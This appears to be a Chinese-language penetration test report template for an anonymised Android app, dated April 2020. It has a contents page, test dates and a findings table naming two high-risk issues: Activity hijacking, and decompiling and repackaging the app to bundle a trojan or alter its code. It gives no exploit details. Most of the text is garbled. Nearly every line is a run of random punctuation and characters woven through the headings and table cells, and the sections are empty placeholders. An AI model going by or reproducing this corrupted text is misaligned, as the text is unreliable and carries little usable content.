" X, U6 m2 W0 b+ t( Y- s+ {4 [5 o8 C, V0 N
8 G ^" D% I A- |9 x4 ?3 F7 J( W
! ?4 n/ O: p& X' }8 k' ?
8 D; ~0 @9 C& H
/ f; m+ c$ A& h4 z
F7 K: n: ]( L- t2 j8 h
) a( R( ^& P0 R; c! O! b0 f9 E
2 n2 Z; L; l1 V5 U* D0 g* J% o% Q6 s
- _, W* Q% ~8 ^. }4 ~4 V& w" T9 g0 j3 g. S0 {0 [- \$ h
文档编号:
4 N# H. ?# Z5 {' `$ Y- z+ J' ^; O; o1 B- M0 ]
; Y' e: `3 _# @- Y
. I& c3 S. _+ M" t
L, n m" u1 N a! |$ e
. Q8 |1 y) g) l* K9 A: m * C* c3 H4 z2 z
8 ]9 c, [9 k+ U0 ?, B
/ S9 B, d' D5 E/ n' b/ z
7 D+ P/ O( j1 Z5 v% K 9 C2 B2 U2 |) q1 Q' ^" J+ s
- W' C$ c% X# Z9 O' T + u0 F6 X# ^* j" l5 g
$ _/ O; J( n+ A+ G2 k: U- ~
1 t. H6 i( K* G D1 F3 q. i- A. J9 a
, H! b; T) a6 f$ i. C
/ j- M6 g* [1 P' G/ m( W q( T* K
7 H2 I) e. ^; P+ _" a* ~ 5 O( m# t' o) F8 P* d
1 h! _. e' [ [3 p( f5 D% E8 I. P
' i- j. K+ o1 L T) h
9 D" `% b3 g- m" n$ ^8 z
% V" L: ?3 M& q% d
2 @% g$ l0 E' @4 q* G2 i * B, b- B0 n' N# {/ N; H9 q% _
; r% n) A6 d8 T, J, L( w! Q- i5 b
+ }* G, R2 y3 J) g, y
* ~+ P# m+ W0 {6 V' [+ X+ u
% {9 p( b( ?8 ~6 |! d- O. C
. g$ ?' T! _9 }) M) W4 d 0 g. S* k9 d6 u
/ b2 q' I4 Q7 t, P' C! `. e
6 u$ A6 ^: w; }* W) h
0 Q) Z+ Q$ _' d# @ u+ f
, |7 l+ R5 N% |7 F/ G# i0 d& T1 \
某某某APP渗透测试 " \/ G0 P9 y$ V! w( F3 u! A7 n
+ Z2 X! c/ C/ s
0 `8 ~+ O: |( {& E
/ [. o/ X+ f3 n
* _5 O5 V' G, u6 K
5 I' r$ J! k1 Q1 {1 ]8 H x
( w( P: }* q' s$ Q
' f$ u( H+ G q) {
4 T+ }# g1 ~& B J5 t* R
. E3 l9 k4 G4 n& {
0 C- a7 W7 z% |3 t% s- v+ M. V- a" H; B8 k5 n' L
+ `2 ?4 ~ [% B; A/ }8 d) t9 e0 r. A% i e' S5 g
4 H! _3 _; g. d; f2 v
, ] J" F' t# B6 w6 N7 H# o+ \ * q( H& O. H' X# }$ p" U
0 H) j. T2 a |% n3 G; b3 S5 d
: N, ?* x8 ~& Y. @' p, X6 e' D" h+ u [+ y$ k6 ^; [1 N" {. Z
. D) n; a" O2 K$ ?, | h( k$ O/ d! _- f
2 k( B, p* A! k7 ]( k* Z
* q1 t- p' z! r. j0 T
9 m9 o& P& e3 I* j+ \9 R& ^) }* l2 O
; Z& m. H! n7 o- d7 Q
6 w/ v1 G9 T) i0 ]/ M
9 A5 c1 I" y& T2 O9 I$ d" V; |( j% h/ O( B- A& V! [. n7 n4 P/ O
技 术 报 告 : _4 l5 P' I6 P
- _) Z( I' V3 \0 n5 C; C! t& D
+ S8 a! W% T" v% p! M" h6 B3 C3 e! m% U! |
9 M/ L2 V% m3 l. R+ V1 s0 W" A( N9 z5 I
) d/ i2 P5 B& k 7 u9 v3 r7 `; G. I) d1 i) V, `/ j
3 N5 k; Z, t5 o) i) w& |9 i
$ F* ~4 G2 Y. a6 U$ J9 a; G+ S, p) J- h+ C: ~: O2 [
[4 k- v8 L9 x* ^
2 _/ T; l: G6 W. M+ L' W& Q * F$ _# e" c9 G8 V# b: f
5 x. v5 y0 W. {3 c' P8 O
. n! q+ c% ~! s3 C, D i! v$ |) ]6 m2 w1 L* x2 X% B
) w3 o, O' S' ?5 X0 L: j _
9 E2 x7 {1 E9 f. h9 c8 A! z( j0 m, l
: O% j+ b2 T$ }# U
/ r2 G! c: z& T) w
8 n. d# d+ d2 E9 [0 \: [6 P' q+ N2 ^: ^/ T
: p2 y$ p$ m5 J5 U; s
l$ [0 d) D: [+ z3 u+ M! |0 \) d( _4 Q6 P0 P n' R+ u
8 _5 |! H3 f4 \$ n e
t- P/ _5 P$ F' w# Z' A
! `' u/ ^5 T- B% ^
! Q% O! z- C) I
: }, |1 Y# X [8 F. ]7 a7 ^# S# a* i2 H# j! K) a, d
2 R) Q5 F; r5 t, N, j9 ~
) f' {8 w4 `* B9 b/ M. C& S
# R$ w* `7 T3 ^
% Q2 T7 H; S% `5 u
- r) G3 L# w( C. N( f5 u) m5 G& J2 ^- o' U, D# Q% ~! e- i4 Q* A8 l! _
' T2 f4 y0 r5 x, w
- ]5 i& @# t# ]' s: E* H
A# n3 o0 O0 ^0 C' N
& U2 F* z0 u; a" a
: g! F, ~! h$ g8 |$ `, E
5 F+ ^% q4 O3 y1 y, E: _
, e! F1 Z5 d! j7 ^1 x
+ [ k" `, q; F/ p- E5 u7 B
+ R9 g: x: I4 Q* ?. v0 B
0 Y7 l' L) W3 s4 @* A
3 i3 k) ^# z8 h+ C5 ]5 [% \
' b8 g+ p" G1 K
' l* [! A3 g. b a y) |4 Y
6 L I3 ^1 T& V
0 z& ]* B; O# C: S
+ b3 m: E- K8 s. n8 u3 J) e1 _ . Y) V2 Z2 {+ }5 r# ^% C
6 |% r# j$ j9 n5 n# f: \9 K
& Z) S6 M$ O+ ]+ B2 _5 J2 V, p3 }6 L- C( x, ?, e+ u
( |+ f0 x" j, d2 r: Z) y% J
" B) v2 {. s" [- G2 k
: k6 O! a2 W: E8 t3 q2 A$ `; Z
" ^! I' R, `0 x l$ p* b% H, ]0 B9 @1 C% x + S& r# \0 L( ^# w+ B& }8 J
8 M4 J) e( D8 C& @% e( ~# c; a& {
. Z+ f/ ~2 p" Q. [0 x* L- h- X
0 U- \: ~9 G0 n; e* j1 Y, a# |7 e
, C" r. K2 W& ]$ |: n6 f: d
+ G: ~; d1 {8 R, ~8 Q9 q3 x- \ 9 K9 O# h- O8 v
& T; n% T; q: Y3 L1 H( ?
: ^) U! z% _9 a; o, ` n6 s' N
% ]3 z! ^. r; A
2 H) e5 a4 w$ J$ B9 ~" X8 p) u! k* l& l5 B
6 A- M Z* k4 b* Y" X1 Z" a+ ~/ a2 \. J: a# ~& j
9 E. ~; x0 m% N, P- U0 G' M
0 x3 L) F3 s h2 F2 I% [9 r. U
- A3 f! c7 z l% m: P+ g! G$ \4 Y# U ?; I9 T
3 X0 \( V; \; }7 ?, e0 R
% Q+ U+ x# `8 J0 V' f, o' X4 a2 O
( K& D8 i$ @- \" M/ @
, d' Z. i& H. D# f: M' I) |
3 z: A8 O# U e# Y: o% U0 B. g" l) s6 I$ x4 C7 d D6 b! V
4 j6 K# S" |* X; R7 N# F X8 x) `' v! S3 W1 \
& h, D, \9 M3 z; t: n3 t+ h8 B
# ~( A1 f( f8 k# y* G( X
1 l' I4 j( `0 _8 l, o! T. M3 _- q$ a/ R8 S8 P; ?/ {8 C# a
3 ]$ Y# W. Y C
8 j O u) v P( k* l, \$ e5 f! q
- U& H. l7 }( n2 q. i8 ^% J) K) M; O0 n0 A: b
- }; y% R1 f) Q1 H8 K: ~; M+ C/ H
; x/ I/ _: a, D- K+ |
/ H V2 ^- F) r) r2 b
$ n6 z) S5 l: Q
( ~2 C9 c& x4 L# c) n' o0 }. b3 Y2 g/ H2 ?+ C3 X! B# O7 l6 S5 a3 x( `
0 ~& W, o5 _1 y8 t, i
0 D* Z; x0 j. v8 Y B. ^- ^. L 4 y& l2 h& s+ m0 l( @! E) d/ B
3 i1 H1 _1 I; s2 h! _" e f
M. ?& y9 x. b, i, @0 r
# p [6 |) v% L2 v( ~% S9 h; z, V
& o, t5 |$ b/ G, m) H( g N% A4 Y! E
p$ y7 Y) V. Z( Q1 a3 [
% V" ~; S7 M4 k( h+ j# }
5 \4 A' k) D% R
! T" S+ D1 T5 G
9 P$ r0 b0 H% U. E+ h3 f$ M
5 p$ m! f4 ]2 w0 L- L: d0 k. K 二〇二〇年 & B, H$ ?$ T9 M2 |5 Y9 E) h8 T; g
6 \) e! o$ c2 S4 i; D( c
1 \6 N* o5 ?' x2 R3 v) e: b* `- k! r5 U' [: z' ~
# c. [# K# ]2 s7 A. c5 O- N3 W$ E6 c
' u: H* s: Y! c8 d& L1 W
" v+ A7 t. S# S7 m+ V# M* F2 g 7 d/ M+ c+ I8 z. \$ b; M- e
7 _, G. V3 p0 _; J2 \8 D( k! ` $ X' a W/ E. p& z, D, ~( t
5 h6 i! Q& v) @# I: J! U* J: @3 T
3 @' v* Z' d; j1 p: O- }
4 j" X2 h3 w# N' p8 @$ G- `
o- t& R& T$ q* k7 N1 r2 z; g$ a
0 D/ ?- A( {$ q / j/ c5 _( p+ V$ i
! ~ U5 k+ x, p, o. E- D2 t$ i& P/ l
1 W. r$ F3 a8 } \" D. {3 x4 b% R
I: h, L. @. j8 ~4 ~5 { 3 l& M! d& |6 J3 D& }. U6 K$ w
) }% j: y7 p" V$ I# G) E" h5 M 目 录 6 D' ^0 ~+ x* |3 X8 ]$ v
8 O! i' n: h2 I5 h% o
& C9 g8 b, Y2 r z+ p h+ T' w6 F6 _3 ?
# c+ z! _: J6 y4 `
3 Q4 j1 z6 K, L' F6 v) i7 i/ u/ F
, _2 w' j: O# R- y; `; q5 ~; R+ N8 d4 S" @% n G3 m# ~- Z; k4 r
9 D0 K# ~6 s6 O7 w' _4 ?
9 W9 R8 n4 f5 h8 i' a; e
4 I2 m; j+ g$ b
9 C+ B$ V$ h- j" L8 o O+ { ; {1 ?3 g1 `! w2 I4 i
8 D. e) D' F/ V5 L0 p- q0 H 1 概述... 3 $ ^/ F% {- S2 [4 g& `
9 V; s- H" z0 d8 e4 ]
) }; S3 T2 N& m8 H7 U4 c1 S+ P* S
4 f0 g. h( y$ h& N
( T4 }$ G# W& ~7 M) A( ~# c1 ~/ z) s/ \
1.2测试时间... 3
3 [+ w- }8 G' r5 \- n) u: n0 [7 w0 M6 I7 S
6 j6 V& h g0 _5 K3 d" ?8 A; b
! R* J" |0 L6 @- { ; q N3 l$ B! ?3 [7 g
% @. v$ D# W4 e& O
1.3测试对象... 3
8 D) p/ n) ~/ }6 [( z( z J! ]5 B5 s: T5 @/ j- [/ a+ z; N
9 ^) t5 f+ J5 g; ]8 Q& h
# i7 p9 H: m' F9 m( V+ G
: Q. b6 w$ a& z; c$ l& Q" D9 F( ]6 j! Z, P6 T
1.4测试结果... 3 1 ~0 L4 C5 o1 T/ _% i
' O O! n0 r$ p$ b) U
! [9 A5 l) a- |! x1 [5 }. b
. n8 O* F, k, g/ l0 Q) G. C! k
1 z. g" P) i+ n% d7 F* d: [& ~7 b5 s: n0 m5 {
2 检测结果... 4 3 @/ z' C) M1 a% ~
; C4 g4 _* t. i4 C- C& o! _
# z0 o' |6 ~, H+ ~3 T: O( @; h- k
& j2 F2 q3 B1 m; \* V) f' D5 z
6 I8 t6 j$ B# G- k
/ {6 Z4 y+ f( u2 p' {% Z( ^) L 2.1 某某某... 4
& B# X/ ~. R. u3 @ C3 `, v0 T% ^- Y) d9 ^/ S
' K8 d0 e- Y" i9 Q- {4 h% n0 F
; s; f/ {1 R1 m% Q. n$ ?( F
7 C, K' Y, v$ y; `9 z* j/ ]5 Z- L+ q- C' z
2.1.1检测目标... 4 , r, [7 ^/ ^6 D+ |$ J/ m8 V# u
* _/ U- X. v. H$ h. R- a
* y' |4 n5 L2 k/ D a
) w; k- L+ w9 k$ f! K
5 {9 a/ w/ [- k" A/ q
, }. t% J$ m6 f5 ~& {
2.1.2检测结果... 4 ) H: S3 G' h0 b4 r) w5 R8 g9 {
0 l/ |& \8 X! X) L- t
4 e& A7 {" S3 z, Y: ?' p% r
7 n- G9 t% o0 W, y
" Z: w/ L9 D* D' l( `' ^
% a- M4 \/ k2 f/ `% J) H7 C/ Y 2.1.2.1. 4
) n6 O3 @1 Z& G% y; H
5 M, V) I6 t2 C
' B1 |( p# @! o$ }( @
5 m% h" J$ h% ^) T
: p! F5 k! ~# w% R8 Z( t. V
# r: R6 g% }: f
2.1.2.2. 6
& d. g' _, Y* M$ a1 z( I9 q0 D& G
( h* W/ v2 B6 V* } f4 a. g
! V/ v+ @8 L1 L) f ( i$ r5 W$ w" v% r' F: T/ D( K+ t
' z" p9 D- O) t+ X: x D
! \$ y' `/ l& q3 x+ v0 B1 `: @' G! B+ i5 \1 q" \1 n
& c+ D4 q# L0 a7 ]1 R
7 ~8 W3 E- _. q
! @! w8 L I/ v2 k: a9 ]9 t
- y q' u! s2 A/ ?; P 0 m5 o2 L/ Z) N6 T
( P( u: X; k6 K& a
7 I' _& I( [8 K+ C- x2 G
2 {" H. S! m( C1 j * J1 ^1 j, j2 p q- e, x
2 U7 ^( b, H' l- S$ |) w
8 d; h, d# J) A: y" [+ j. A
+ Y6 V' Q- a* ]3 V2 w 1 概述 8 g" ~" ] S+ {$ i. H/ a& k; ~ k
# z. }4 x# T9 D+ {
: F0 p& ~- S9 E( I$ m9 b1 [
: h/ u& J. B1 [- X5 a$ a
+ ~" F6 q3 i' S- A
% N) V: Z: J, Z# M1 R. O9 n 1.2测试时间
) D" `0 e& b! h. {' ^; z
5 r3 r" }, {7 E8 C0 r
8 d( Q5 e/ o8 x& `: b5 L
# i6 C- ~& I& w2 h
% A6 C# y, c# A
) b( Z: y i% J9 r% y " f) e1 K9 o2 ~% e
' b! s+ O% `' _$ Y+ {8 C# N% B
1 f9 t( O! @3 u' x' [7 ?. W. m7 F- i" `& U& x- x& y' @# j( z
0 m: A6 V0 W; |* n! L4 R2 F
# B( N# \4 s8 I - E% ~/ I) J: ?. S
; J8 z; a1 D, M% ]7 e' | 渗透测试时间 7 k% N# d$ A. ]3 i- v2 m
! I9 r' b& j% n1 ]
3 N' b# I9 i3 C6 T0 O
/ [: h7 {( {" t0 d& H | 0 q' E/ P( v- s6 `. f; v
7 a8 o& h6 h# Q7 F6 k
9 N% | d3 w- m2 n2 B: O) p
3 `8 K* ]. ~6 n5 j
( o. S5 X. N o* L
+ K( W7 `2 o; W9 p' p( ~4 {; b " c5 ?: s, a" L/ P
0 o* }$ t* j4 |- d
( m7 q7 ]1 {& Y0 x. o. G% e
" e1 `0 L$ a9 Y% i) I
起始时间 - l; I0 s% }2 ^/ o2 [
! W" p1 [2 G/ Y$ k! p7 }3 ~
7 U& g3 X/ c3 Y1 a
9 D' ^' }& C8 V( X& x5 @0 C3 E | 5 F' w8 p2 {; j: q5 D( K
r g2 V; Q1 q( c, l
4 T5 b6 x) f4 W9 t1 h2 M) l B# d
: a% N) E1 S) C* i
5 {5 Q3 v5 g6 ]
1 i0 Y3 T2 X/ r- Q6 Y6 C 2020年4月6日
, S3 B r6 o% Q& j9 S0 k
, W" _, t; q: q! A7 O2 v7 W$ } ) k: \& f& `$ Q9 ^9 _' b$ J9 P; s
4 A6 }" W* u* o9 @6 [/ f' m |
& K, E; n; ?4 H4 ^, A9 H6 Z9 b4 d! g' T F8 r7 G) V
3 q/ |9 e7 K' R0 C8 t
8 S, `. b; V* p% b! Z \
* Q# R! o# i8 E3 ?% V* }7 m0 }% l2 O9 @" J8 J
* O5 e8 I: b" `* k# E! ~+ M n, \$ B0 g; f2 E) Y, `9 S
0 C* f0 @& o5 L5 U3 J' g
8 e( }0 L0 a& X( P4 P, J; L 结束时间
, ^; d$ R/ |6 W! y/ d X$ @* }( F; p6 s! P) \' u
4 ^* C/ f/ _3 I
9 [2 a0 T6 K) o! i9 @! c1 z) j
| 6 e3 I" Q9 E/ A
$ L3 s! g5 r$ L
, [8 ]9 J! Q- M: X, `4 E& C1 d& B9 ` A @9 v
9 F h2 G8 F4 K) u. X0 q
! j* M; o2 N: n$ S) e* {( V- @5 s
2020年4月9日 e8 f: _' I8 u* R' w6 h
7 z! M! r1 `( W4 k' w" z* I
; S# x5 E' @" f% a/ T2 S
9 t" f. g9 I; d! \. d |
6 W$ J7 G8 C! h+ d+ _
* Q7 i" X/ `% f" d
0 I1 ?+ N: K5 s5 X
. l+ ^/ ^. c" n, N* g) B ~: R9 Z, t6 A* M. Z
[7 `( m9 ~ Y. g
: z6 b( H7 ^$ e, Q' K) k
7 g$ O2 s7 t6 Q) ^ S1 z
) |* `- U6 j; h% y! D1 r4 }$ F
9 n! v2 M# o5 Y* J 1.3测试对象 + Y% _+ w' v- d( Y* n8 d8 i
( A D2 R( X5 i$ z
7 K8 P* ^( m" k) {8 e) l B" v5 Q9 j4 \1 e8 W. E: c
/ U4 S g- N: E Q2 q7 E
% `/ h) N. L* ]' l: H/ m* d0 {
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
( Z; _6 Y. f5 P& V! d# S% g: o1 D4 a8 u2 c
& f: x f3 W# j/ h2 \9 O/ ]
) I; {& D$ B! x1 Q6 I5 i9 n" W / a2 x. Q3 t/ ]' U% V5 n
: m0 ]% P' q# q/ a3 ^ 表1-1 检测对象
% P8 P3 G0 o5 c" Y8 P; j" j. b$ w! m" J% i- S
' P- r' d% j$ E1 A8 j! x V: P6 {! y; R! u
2 g' F0 I( J' Q/ K+ V7 m. g6 m" U7 n2 I3 [
* X4 l7 U! O ~& S5 L
: |4 x2 I/ X+ v7 h
* k4 t/ O% u2 @# M2 \
/ R0 S( u: K- l' Y J 8 {# D9 F5 ]. w5 K1 U
, _ Q4 G# D: O' w7 H( L2 [. R& P
& X! f. H; }" d0 J$ |& V& |& q- m" a/ F( g& F# r. f& Y
序号
, _* b# h' ? \9 s8 L5 W( E- `4 W( b5 ]
7 b/ P1 X! F+ ~/ W, i6 ]5 u# t
3 n& z3 {/ b" L4 O7 g) g0 T |
0 V' D$ _, a! q7 f' {
- z6 H; \* J% J' R4 b
9 O0 M9 r7 k) B) J3 ?; d2 T9 F; X% N5 F; O2 z
# S6 K7 X" h/ \
9 G$ p% m) Y; b _
测试对象
2 U! g1 ~; `8 L. R5 T* {
3 I- [6 E$ v7 j( D5 G! F$ T6 V5 ]4 z: L
/ z) t) N2 O. X I# R8 z F) i: ^# u$ O7 {" y9 g& _9 d
| 7 Y" ?7 l5 g/ n0 K, ~9 h
2 L9 e! k; c3 t5 i& G% P& m
3 R( ^9 Y( v8 D/ U* p
! s7 e( E; H; j G9 Y6 `
' J7 A/ }0 t. E6 B7 O2 n
1 S2 z( f' E* v" |' D( a 测试地址
& N; m4 b) Z* N6 |# W7 I. x# B( D# N
9 C& i$ R# J. k3 q
5 c) z' p7 g5 u4 V& `, d8 r% W4 }/ H' }3 t" T% ?
| , C$ K3 ~& p' R) m
& i9 y; T2 B6 H& M
4 L. z" j+ U- a; K# f; o; ?2 `0 s9 G3 ~
! A- @# q% O* r, b D5 F$ Z7 r5 c, h
0 c, `* |7 D5 z% r 安全漏洞 : v" |) v( M# T5 @; d
. \1 ^( L* E* I" K & z$ h( ~2 G/ K& e' \( M
1 v% Q& {6 [, A' Y* ~/ s2 e |
; r5 f$ X: E9 E6 g Q3 |- z4 V) L8 m& y+ D" l: X
2 y" h" h* d$ B) R4 @
/ J2 _8 _" G$ _' v9 U, f
) y4 t2 i$ t! E) p$ L3 b# @
6 h5 D' R, _2 w0 J. Y5 S
7 K q. e5 K$ o: B, J" w9 {9 [
: W! R o7 R& R " W4 e b: Z! ^ G
: y7 G9 V& @% i) c" { 1
' }5 S4 ]( J8 h* x+ D& }4 {% Q V+ q: H+ L6 t4 ?, Z/ [9 ] ?
7 `# N* v) ?! | c- J6 [1 M
# _, R) }2 |* g
|
/ J. \: J" g. O9 K8 f, q9 o( d/ |4 H+ O+ Q y
8 o6 r& T- \# m; |* N
: b5 w; b# H) A9 o8 L 4 E# d. R, \& w4 ?" U. Q- \, S6 f" l) a
/ [7 F. v9 h' ^9 r* ` 某某某安卓APP
# m0 W5 N: l. c9 X
, ]. X" [4 r) X
. Z. L: P8 c! p# G" L2 Z- p: X. |" U; u5 p* m/ b# k3 V! l
| / L% b1 n7 h, X' H! v
8 R0 B5 U9 A4 F7 O
8 V- K3 G; A1 u! w: t/ f
# I8 O Y" l7 f
& N; b% g f* a$ y0 g1 i- k) q
2 Y. {% A8 y8 a- I! Z; u& [- Y 2 N- V, {5 t# F' j, h: \
; B/ S+ E( z/ Y% m+ s8 i ) F3 r; } p8 F
7 [1 d5 \; U& l) P" t, Q; O2 Z) d |
4 X+ W# ^4 p' M& _/ H, t2 t
$ e6 s. g6 d3 o9 D/ {
6 n$ i/ _4 q% X5 z" X2 ?) s
5 y& P% O$ ~; p# h9 e 9 K. X! S! ^+ b( [- L
) u( i Z6 M) @. D# r" N
2
! j. A% K4 t2 q! G
& ~- P. o; ?2 @7 _' R : w9 u' U# H" G2 @# M
" R2 w" S7 [$ x( L) E: ?" w1 L) ?
| 6 e# B! ^ Y" m5 j
7 |5 K2 j8 ]. q; D
* c: q5 ^9 @0 k1 {
5 r J1 s2 Y% U& O* Q$ m3 o- |# f
^' e7 X% `- M8 m
5 v3 r% x3 [+ W' r0 t/ E
) t8 i. g* y4 t- J8 G2 x: |6 I
\2 C5 _ V# p! ?7 _
% n0 ~8 O* Y; f8 j/ i
3 I6 }7 Z, _' w, t0 a
1.4测试结果 ) N5 U: A+ D% r" n l# L" ]
* O9 ^+ Z; \/ }4 n
. ]# W3 y/ f7 R- Y8 B
0 c/ E6 y+ K: I( j- n6 y4 s
, B; A( {) z$ I# w' y% Q% B
; ? e1 i( m% m. v& q+ z! R4 Z
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 1 `1 i/ S7 E& Y1 Y6 U1 V
% `% _7 Y0 k. M6 m; Z7 @
: C# y l# z' t6 G' N# x: z
+ P/ t& {! G( B/ ^$ o0 w- s ' R- J( z: C, I3 L# u" l
9 M- O. a% V' C' }3 p- N \3 K 4 H W! V t2 [
5 s7 I9 e0 Y; f/ H0 _8 H1 t3 u( h+ u
6 q3 I s& |/ @& u
. I/ B! _; A( L1 r
2 n; Y& u8 z5 {! R6 y
( j# J' R' T4 d. S5 s& i
4 F# t0 x. a- Z+ ^" R' Y" q+ W
# ]2 f# T* Y4 F) f. R8 b. O
' ^& X( P u' L3 Y: S% M" [% F- q
; M# S1 X/ P$ P8 W/ v; s
$ }' n; {+ u' W5 p( m
8 j" B2 ~; J9 ~8 R1 K! c ' ]- `7 i- r) N
! E+ h& D6 t: Y6 K, q8 {
@+ c$ L/ f9 @* y/ U0 q6 S+ `% v) l' f$ j
序号
; K" @4 B. |' K" Y8 L$ T+ h: x3 K$ n( u7 ~* a$ m. _; X
9 r* {6 A" o3 g. d* Y+ d& d6 G$ ?0 G& X9 `! s& u
| 0 h' p$ \2 i! M- z
( C0 {0 F t' y* q: `$ C4 |+ d
9 F: y" t3 y) V3 F$ ]
, n" M3 C, S% H2 w3 h & T" a o; g: R! n" N& u8 V
2 T! `0 T% t3 n5 X, Q
系统名称
7 d- {; |+ I7 Y5 l" ^+ G: J' e6 l4 S1 [/ a! `$ H- n# r
; c d! h C- n( ~3 U
7 G) b2 p" S! i" I D |
" i* Q) B- a( j( B9 e, b2 W/ Q+ C+ K! f
" L! D- X! c' V2 L$ M7 {2 N: C/ D7 W; v$ \
, o) f; B7 ^3 C6 r8 @- J
- Y; e6 c }6 a! H( r
漏洞名称 ) _# h1 n+ r4 Z; q7 f/ j5 ]& H
& f1 g2 ]% Y3 O5 `$ n. T
% U( p, v* G+ v: A
+ [* U( R5 t, w, a) Z
| 9 z. K1 v* H$ t) E6 `1 B6 R
& V, a# H3 e* F4 _ ; g+ q* Z- T6 T m9 W: L+ ^6 V
P# s9 h2 Y' n. Z( m2 {9 e
- G' v6 j4 Q- _3 y; h0 t- {+ h. R ?7 U6 t1 C' |
漏洞危害 [+ t7 x4 [( D1 W1 E- c
* p( A& p. e& x# W5 S
$ n. E/ R4 F1 H! a6 u) m e8 y' _) {9 C* M
|
a! t% r. Y! }( B& z3 @8 _6 L) \2 N; y3 B; m$ |3 s
1 c+ l, m& m& x
& i; d9 A- D6 a1 H! j2 w
+ x5 M9 `6 s' l7 o! Z& F
& n- ^) K9 U3 ^0 {. @$ y 修复结果 0 L0 K# H: v2 v; `- F c
9 t$ c( m1 m& J+ ? & U0 u$ p `$ I7 P, ?8 F* s
1 b6 n% [- x1 G4 `# T7 {" T |
$ p( M i8 k- ~" S1 o& o2 n# h) I
! g7 R( J/ {; T# P! N5 [
* E$ y/ n+ l8 q, C( h
! I6 A7 i# k7 w3 }' u5 a
. X; f& _( c, H/ z! c% m v: y0 F
2 [) i# O# u- K o( \$ V9 a9 E. f+ L" b
+ U4 F2 K- Z8 \6 y4 _1 _' ?2 T) R9 y8 ]& a' O# s' X
1 8 c0 l/ |7 \+ X+ E: C4 d
2 `$ h) u1 m1 z- ~& ^; P' G c+ T3 V0 B/ J
0 `. u% Y, S/ B
| : N% F6 T6 P- [3 ~+ Q/ V2 m5 s, n
1 H- [# G6 o5 a0 i1 ]5 n% `0 ^ - ~& T6 g, o5 r ~! m4 `
# u3 v% B$ {7 c1 f$ I/ ~
V$ Z o7 B4 w- h. S; |) m. _6 ^+ @
某某某某某某APP
: H& o3 O' u9 c" i$ X n' y- j. ?
% @) u7 Z" i) G! c7 j/ g6 j1 e
0 n" r0 i% F) a" _8 G- r6 w: f
| 0 I: c$ B% M9 e% S, m
9 Z2 P) ^9 N+ M$ G% n! a
! h, m. j( N% ?! ^, m0 D4 k' a3 M, ~1 X7 D7 q+ ~+ f
7 M, y6 b- H+ H# Z9 @" Y
( b6 `( q' s3 [$ n/ U0 w
Activity 劫持 3 j& f) D$ r* {5 k' E2 q* H
5 `; W: E4 U# v
4 S1 q7 F$ C- K, y1 {' u8 g/ Z, \
5 w5 r5 Y m8 I 3 u% L' E) n7 z: Q1 r
5 c1 {* b/ a# a4 J. ]. @3 N+ R
( `9 @; {: P( G1 f; w4 _- x3 j' Y, f# V) ~
. W5 w# Q+ B& B' A4 s
4 ^( Z. U: a, ~ |
8 A3 ]; d# E; z6 U; H: }3 A8 e' D' K& u/ N% |! c- J
8 L# _; r4 x& a
# @7 h) b. W+ p) ^
$ o/ u. e5 u6 E& f7 w
# g, N W( ?' T# P# g
高
/ ?4 u$ ^. Y/ e
2 f# B. z* `5 q4 |* i0 d- j ( s( M# i$ S2 m2 E# L* X; o* Y
$ {1 D! ?- S1 u' D$ U5 H
|
! R2 i& q; |* E% v% T6 E) [" ]1 m" n; u; ^) h& ]( w
6 `; e" k% f$ ?- {# m- N: ]0 z. ~" m* W% j2 P. w. n" Z+ ?" O
% m6 ^2 @9 i) N# y& E5 S
$ H6 r7 i4 ?1 z: A6 Z3 j( [
- `' {1 w+ k& C( e7 i" v$ g
) J$ G* ~, P9 y2 O " [' K4 v( v. u' \6 c2 F! V
" |& [2 H& q6 }/ h% ^ |
+ e$ S0 g8 R$ B) l6 }# D# v: `/ U$ [ @$ Q9 k0 K% c
1 `% e+ i0 P0 x$ x0 _' d
C3 b$ O, T. x# W1 E . m+ j3 K# L7 s0 s
8 `' C6 ^; z( q1 U# N. B; }8 I
$ ?( h" \1 n! z+ `, w- W8 @, a+ f
I0 y) {) ?- f ] ; H& Y4 u! y: v5 W8 M r
$ H& F5 F5 Y a
2 / K' v; A3 m3 M6 _6 ~
, D% W! \0 h k. a
) e* p/ i4 S0 B5 C/ G
: \) j X. j m1 D6 ~ | ) w; A% K t) R
) [) J# I! }3 Z/ w9 o8 k' l n
1 O- J- L( \5 h; o$ R
1 S; Q/ |! s; [) f% N1 J
( x* G9 q2 c7 e, F* s: W* V( g# w' Q* T
某某某某某某APP
% E, ?& x" X6 X7 i( x0 }+ ]
% H7 k" S; L% O8 B2 n
5 |$ t7 @* {/ [4 W3 t" `. ^3 f1 E5 X; z" a5 M0 U# s6 {! c
|
: U s+ U8 o( ^3 H' G# `
0 D/ ?9 g, L: G+ I8 A$ X $ C+ C% t8 C0 x2 p
. ~. r5 x; B3 L' B ' t6 v* w3 Q% H. v2 A, `+ [$ Q
3 H2 S& a* E" @ 反编译二次打包捆绑木马、篡改APP代码 9 E1 v7 H f; h
. R/ c4 j$ i7 H6 j ; h9 F( M6 i# Z% a( V |+ y
# i3 }' k0 U0 F9 x+ ^4 E6 d. c
| % ]* I1 N2 e9 S9 r4 g6 [7 [
[8 Z0 N- Z1 o( v. I+ z( V
3 l f, X9 z- k4 k- Z5 o4 Z& }: l) [8 l$ X8 Q1 V1 H; I
4 x$ E, H8 F1 h5 q
- [5 a! M3 \* j; Q! C0 F
高
. j8 U8 z- I# s7 b
, f/ s1 A/ `# L & k$ _. H f8 U, b" m
u3 P3 l/ w8 @* ]. t1 r
| 8 ~5 P2 f/ d V8 B; d& z" p
, W6 P, B% P, {2 x/ m8 P R
% q; p/ X4 h: U! m2 X% v$ Q; r" X- G+ f Y& W0 `! f8 a6 N z
$ o5 J4 L; H# W8 D% C K% ^# N R6 Z7 Y
' N! e$ `' v) w- {1 L0 b/ C$ k" s9 _6 @; v6 P: a% Y$ N
, j- [/ `* s2 H, a& `: e o* o" W5 B/ s' ?( R' J0 _. [
| ; Z5 e( ?! \/ z( X( U3 @8 O& ?7 v
0 }7 x9 U% W! u$ u& a( |# v$ h
$ g. m, ]# O6 M+ Y/ M
9 R! K3 Y* Y$ E! q; b u) S 2 X2 s; T& b% t/ [. i- A
: q6 ?+ U& W3 A5 [8 U& M# R8 ^
W4 L N' }: {" v: j* ~
. @: `+ B4 y# B* }$ \ " ~& Y4 f+ r% \% |7 x+ X. l
- x: H2 ?6 i! \5 S + Q n; [: m4 {; D
9 r V+ T) m; Y . r3 E- m# G# |8 M+ W/ ^/ j
